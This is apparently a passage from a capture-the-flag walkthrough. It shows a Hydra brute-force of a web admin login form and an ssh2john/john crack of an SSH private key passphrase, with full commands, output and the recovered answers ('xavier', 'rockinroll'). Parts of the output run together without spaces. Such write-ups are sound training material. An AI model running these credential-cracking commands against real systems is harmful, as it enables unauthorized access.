hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.151.107 http-post-form "/admin/:user=^USER^&pass=^PASS^&Login=Login:Username or password invalid"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-10 14:36:37[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task[DATA] attacking http-post-form://10.10.151.107:80/admin/:user=^USER^&pass=^PASS^&Login=Login:Username or password invalid
[80][http-post-form] host: 10.10.151.107 login: admin password: xavier1of1targetsuccessfullycompleted,1validpasswordfoundHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-10 14:37:07
What is John's RSA Private Key passphrase?
Answer: rockinroll
Steps to Reproduce:
Copy the RSA private key and change the file permission to 600
Use ssh2john for bruteforcing with john.
$locatessh2john/usr/share/john/ssh2john.py$python3/usr/share/john/ssh2john.pyid_rsa>forjohn.txt$johnforjohn.txt--format="SSH"--wordlist=/usr/share/wordlists/rockyou.txtUsingdefaultinputencoding:UTF-8Loaded1passwordhash (SSH [RSA/DSA/EC/OPENSSH (SSH privatekeys) 32/64])Cost1 (KDF/cipher [0=MD5/AES 1=MD5/3DES2=Bcrypt/AES]) is 0 for all loaded hashesCost2 (iteration count) is 1 for all loaded hashesNote:Thisformatmayemitfalsepositives,soitwillkeeptryingevenafterfindingapossiblecandidate.Press'q'orCtrl-Ctoabort,almostanyotherkeyforstatusrockinroll (id_rsa)1g0:00:00:0557.35% (ETA: 14:46:30) 0.1792g/s 1483Kp/s 1483Kc/s 1483KC/s erin1394Sessionaborted